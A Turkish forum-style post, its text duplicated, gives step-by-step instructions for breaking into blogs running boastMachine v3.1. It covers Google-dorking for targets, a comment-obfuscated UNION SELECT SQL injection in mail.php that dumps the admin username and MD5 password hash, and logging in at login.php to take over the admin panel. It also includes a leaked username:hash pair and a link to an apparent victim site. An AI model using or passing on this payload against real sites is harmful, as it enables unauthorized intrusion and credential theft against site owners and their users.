google da "Powered by boastMachine v3.1" olarak arama yapıyorsunuz. Karşınıza sitelerin blogları çıkmakta. sonrasında çıkan sitenin sonuna şunu ekliyorsunuz :
mail.php?id='/**/union/**/select/**/1,2,concat(user_login,char(58),user_pass),4/**/from/**/bmc_users/**/where/**/id=1/*&blog=1
yani url şu şekle geliyor :
http://kurbansite.com/..../blog/mail.php?id='/**/union/**/select/**/1,2,concat(user_login,char(58),user_pass),4/**/from/**/bmc_users/**/where/**/id=1/*&blog=1
tıkladığınızda admin adı ve md5 olarak şifre önünüze geliyor. Şu şekilde :
Send the post "lacarmina:c8ad6023bbd5a89ae8f6cd6fdc6a9ead" to a friend
örnek site :
[url]https://tik.lat/Mi2I5
sonrasında login.php olarak mail.php yi değiştirin. oraya kullanıcı adını ve şifreyi girin. Sonrasında admin panelindesiniz.
Kullanılan kaynak : milw0rm
mail.php?id='/**/union/**/select/**/1,2,concat(user_login,char(58),user_pass),4/**/from/**/bmc_users/**/where/**/id=1/*&blog=1
yani url şu şekle geliyor :
http://kurbansite.com/..../blog/mail.php?id='/**/union/**/select/**/1,2,concat(user_login,char(58),user_pass),4/**/from/**/bmc_users/**/where/**/id=1/*&blog=1
tıkladığınızda admin adı ve md5 olarak şifre önünüze geliyor. Şu şekilde :
Send the post "lacarmina:c8ad6023bbd5a89ae8f6cd6fdc6a9ead" to a friend
örnek site :
[url]https://tik.lat/Mi2I5
sonrasında login.php olarak mail.php yi değiştirin. oraya kullanıcı adını ve şifreyi girin. Sonrasında admin panelindesiniz.
Kullanılan kaynak : milw0rm
